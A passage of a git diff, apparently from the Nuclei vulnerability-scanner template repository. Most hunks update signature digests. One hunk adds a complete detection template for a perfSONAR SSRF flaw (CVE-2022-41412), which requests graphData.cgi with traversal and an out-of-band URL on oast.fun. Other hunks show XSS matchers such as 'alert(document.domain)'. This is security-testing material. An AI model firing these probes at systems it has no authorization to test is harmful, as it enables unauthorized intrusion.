490a0046304402202991221c4543d86fd81a142e2168d712520f167b1886c838e2b6b11886c8bf5602204eacf386eab1d1fda41e4df4a5913aa45c8154d9483e65f68acd48a7f9f1a290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml new file mode 100644 index 0000000000..5af2d670a0 --- /dev/null +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-41412 + +info: + name: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery + author: null_hypothesis + severity: high + description: | + An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks. + reference: + - https://github.com/renmizo/CVE-2022-41412 + - https://hackerone.com/reports/2445802 + - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb + - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html + - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2022-41412 + cwe-id: CWE-918 + epss-score: 0.0012 + epss-percentile: 0.45431 + cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: perfsonar + product: perfsonar + fofa-query: title="perfSONAR Toolkit" + verified: true + tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar + +http: + - method: GET + path: + - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4" + + matchers-condition: and + matchers: + - type: word + part: body + words: + -

Interactsh Server

+ + - type: status + status: + - 200 +# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index aa1bd7857a..9f6631c80e 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 4a0a004730450220248211a7737516dc2c6a5e61af5b5ac02402f7ad47af2dfcdc9a068ae623e202022100b78c85fa0c18bb3189fabdc1d4bfbfb2bfa7339a828b1de5d6c7b8c942ef2e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 0b79a264a1..487d6d487a 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200272dc13c60338528fc6d182bc5801a628e88d0ba3b2fa86f51fbc7915a0cfc9022045918cdf29ff45808f413ca56322d46e5ab714173118912a901a936ec68f2654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 3a3cb63e7b..45ed564efd 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -169,4 +169,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a004730450221009bce375211ffb4edbfca03c84f2357fa3ef3b52efbb43014482020d8bc91152a02207054c86390d97b78c5b487c6d7f01b2dbdaa83cd84bb85f54f7285eef31a685f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index c25676de33..0752ba3d76 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -71,4 +71,4 @@ http: - '_wpnonce=([0-9a-z]+)' internal: true part: body -# digest: 4a0a00473045022056ed74a8cc0ce0089a83d4c15b4bf1f89a0ace772be7fabcfc937d2f3084f868022100f457c7292c10b45f14532633d4f8480152018b4865ad89bcb9e5f29fd2fb4bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054e0cb92b1de30b9a6096c941364f4ef3dd2f229205099d8588224ea2f58f6c7022100ff925bcaa75297254f5780ad4137c14bd3e834a259440ea032f8b9a86bfc8fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index 93f7116ec9..d16dedd21d 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100f6bdad89188a95854cb1f77c9e38ef789a161dad756010692e3225ff19764ebb02205ec3f6492336019dfdd29a6a7284c93bd70fd532fa934f3442a55d1eda399282:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index e53ab59af2..1dc7d0f8b4 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 404 -# digest: 4b0a004830460221009be73bc519c637dd5054cee7d778284f9591788dc6491f0d18a2f8a8c023cbaf022100b1db2f809b94e625298732f5444436cf31923a3d6cf79c6d023eeb35ea53df75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index b3860a1e31..0bac3de00d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 490a004630440220344e3047346a4714a8eea9ba007a1a8122e5c5aaee9129ca74963f55d6f71a6c0220497fd384c3179770b24d14578767486ef3df57d4bf798018445f113e3972be3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index caebfb868a..138f7b839b 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099df6d6c64b89a66b46a14a2ff01c05065b76776a140c694b5f0a3a9295df01d022002780ee2056c4695800b44e737cb5ebaf335370071fdd45056415eeb672c6561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004861bd06361905004a5a3a5fd6715270499b87d1113acf26602abe2cca52cce0221009a6dcf1e34ccf2f1cd18759061c384d5b62637883e9d2c2b0652467c6edb44fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 67f9ca10d3..e9be075582 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b86b6d9083482ed0b2983e732cf5792063b4f9b0035079fc49b9b4705271f0e402204271f0742aa775324ab38b3215ca9024486ed72410b3c4fefd0b27eedfc2ddbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index c21d20e83b..46e174e250 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202deccf59c892f9580d317434219d6ef30736db1f86f1d2aa3a121e469e1dc63d022100906e7a9074d2c904c24fcd26f5d9817c2fb79828367773ec8c33050a59ebd910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index aca53ba486..6fa025fbf6 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100898e228829fd82b9dce68c6110fb196137b2977d20a79b0c60f952db3390948b022006c26b29a8d2f9341b606194aa52e32c0a4f9c370efbb5ea1d18a2e11413c13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 2fa1e8b470..d8b5febff5 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -45,4 +45,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 4a0a00473045022100c563b5b25dd17a1eda7738d760d757d2d2f84adc03fe85e1896ac449d30709fb022054609ba529e568b49ed51c892817c8b4ae644307684eca8544cf527d17e900d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index c7fb80ac93..af318067a5 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "panda-repeater-add-new")' condition: and -# digest: 4a0a0047304502201c8c3a9b761536aaaf55760f176aa4257689de08669c1670213ce86ec292271a022100e5af4566eb7dd86c2f835ce3ad970b4a788e1788aa0228969dc868c1de253b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d682dc0deb41b55d00a3fa9025b6e1d5ec6a980ea73308b00592db5f9c317eed022100bbb00e701c82b70533ae2125cbbe1ea9c19ba5ffe06aa67a1830a8d432c0fd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 5db31667c9..2d5f2093c6 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a004730450220143168c1b305ed93cab568e945f53a466361e4f6e82e8a0d71a4cf5ed0e26619022100ef5eb1e42d65ef53a4a5c1df5f690b50dc692d77bbd8db63e3092eceee9f00cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index b919211b7a..13fd099436 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a0047304502202f4f62166ad699860b3616a05b614b1c6d20a11a1245b2e3e651f30027954ef0022100a577de41e36efe33792d060931099261197e49f4aef9ceb5f8892728786ff1b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index be541f4b7f..87d4b73096 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a0047304502210083e939c46c8e7164456fca20cc3b25e7963b6e64c9679a07d336fe1dfbcdb1450220376fcd72c82ef5f06e1089c8d723263595caca544a05ca90ab5a84c94bfb15cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 87abba2381..6a3a117619 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4b0a004830460221009cd1def07accb4d7a167385baac24d012a4d557d542722d14ac22ba120123d4b022100a823176f08b0982fa0ee2a8c8865ff0a4abe0dfb741162da0bb4fabbd7d8de56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 6876a33843..945f09a011 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -64,4 +64,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and -# digest: 4a0a0047304502204d10e3d09c1ce6f137eddbbd902e249f6e55c3a1fb8e99e7111b4068eb64b75c022100e48053df3d1d9602f511eba62269d27188250fd30072b4206561806cb17e66d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index b549e2ab26..0348ce8bc0 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -63,4 +63,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request -# digest: 4b0a00483046022100904b79f31961db573ceb52d84bf4afaa3dc35b9594c06eb68b7e0d0bc65f88ce022100ef270ca5aac95544e474be40c169a9c2e132e617aa387ceccfee3c3680ca6eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index d4772b290a..a969924eae 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a004630440220460d101869eddaa62591b2481c7642a32a9692be860722b15fee00e93bebce2c022007fc83a5d9149ae234a3e09aacd2f9618d6b69655a952692b82f0e7dbcaab26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index d5c25b47bb..0360fbb3cf 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -134,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a0046304402202a277adf325e907783948f58e835f246217081350a975f1aa8363c3c3afc832402207467c7b3e8b41142a2730377d5b9612d853d1b5936be83d0bc98f393580abb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 0cbca36dbe..c6c75dba21 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -134,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a00463044022059a9e992ab50c6a309519cda8b87151f1b0f0e93d7c576ddfd7e3aa0a080ecff02206728c5629915d2c7fcbec6456684dcaae53d35c239b8c55713391969e8d04e56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 1ddb530ce5..6e5a05dfbc 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a004830460221008510a35387a5c71391994bbfa822897b9e8a6be5ac47b78855fbbd8ef26b8a69022100b9076ccea71c902d7c4d7c5972b07d1b025ca8d483c01aae71b10209049e7567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index b0385a0a8c..1fbf828fb0 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -147,4 +147,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022100ed41133868d3544c167f1176e622d0e711fa163746ebcb6c264a6395e1e2566602200a16e151e03a41738e7754788e97c9529ede6ea5187cb923ce28b0e54f264ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 4d60d21c69..d6cae7559b 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -168,4 +168,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4b0a00483046022100e6aeab202e8a30221c043be95ebf87ec7e472d14d31cd29e72c09c4b71ac2cd6022100f427667947ff622a56fb1037be5ca7f5d418a7057678e873d26b3e6143e1a863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index aba6f158f0..b6bf794878 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -103,4 +103,4 @@ http: - 'name="username_fieldname" value="(.*)"' internal: true part: body -# digest: 4b0a0048304602210088acbcdc986169d2f93fed09c87250b324f36d2deaa862d614df06e615cd600f022100ea5510e8a18ac8917ad2259220bcfe3abdc22f25bb7df5b19b21226426f6465e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bbd80622f1f04490521053deeca5606b0a210f7653053a685aaa4abce0fca8402204d4cd83e2003265d8894d8f57d458ccb79a94b581644b8968eb1b268fbb063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index 479dc6feb6..3d239db9e3 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -103,4 +103,4 @@ http: - 'name="app_name" value="(.*?)"' internal: true part: body -# digest: 4b0a00483046022100cfd0fb83b01021ce3c7642b9b75ec24e89e37b7f58c2f605531c5e90a04a94c7022100fbb9087cdb6016e1a0d0353d71833be07b257a7473e17af21a0c74f58fcc1855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220236c2ea7a5a87ab71674dcbc6b934a4397029b3d326ba6f7e3a9a51beacb9a94022066f22477022e34bd8d4bd31f88af1c31eae3632e616489ed4c7763b4ea2aaa8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 8f8c43b76f..1a67257e6a 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bf756ae8800397d042c663ada9857f74fb0c5721f939fea481beb28ec8f9b2b00220010fe5aed8bedc9f0c5c325660b56f0e9fd8e533b6dae02332353b19fe58b994:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 0454ac33b4..7918ee902b 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210089fca1852f869e32aad4fa9b6fba7e61fdfd3f8ac0b48fce0113215cf6e95b3702200ba73b85c5d8887bb04b5769460358d99643fb9483e04252d98494a58ba16c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046a2c0fe907c58a9b3874b212d37ff610222781cef5966b7b7b95dd4e0f16b7902210081f249fa4a02e7e56036f9e4c8e11172e9948b3236b1a137878fd87c08f037dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 2cda9505b5..7b9cc20217 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -51,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4a0a004730450220649b1f3124639c626e684534624b99face1a359402a10a725f7eeba401597c8d022100ab90100c4d40bb68162d9c0665bbbb6e7e4a7e8aea4269b5dc7f2b8585130abf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index ce04fe0886..20b4393803 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220382e1c786a1cd11dec1deae655b2dd195521a1f0ddc940d24d0db68562314d34022100bcb270d89b59c157ea4b27e1ffbdb2b80cf0091982f7787e9ca737567422b0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 30f12a225d..8e3f8ca4de 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008bde91621a408b30438a9a55908fddbf5073480184541a98f4e8d034c78226d4022100ea1ee587b4d146659b99c564e4a08c40345e8d37e4c29395ebeba895d7225725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 5f6fdc0e26..ef22ee023e 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -133,4 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body -# digest: 4a0a00473045022042e3b60423607d32e2ba9250218c67e4bb11071f215f81a571ad50fb56e9d76b022100be08712a975338af86c5afe8cefddde8894d17fcbe45924e7c38d41f230688e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 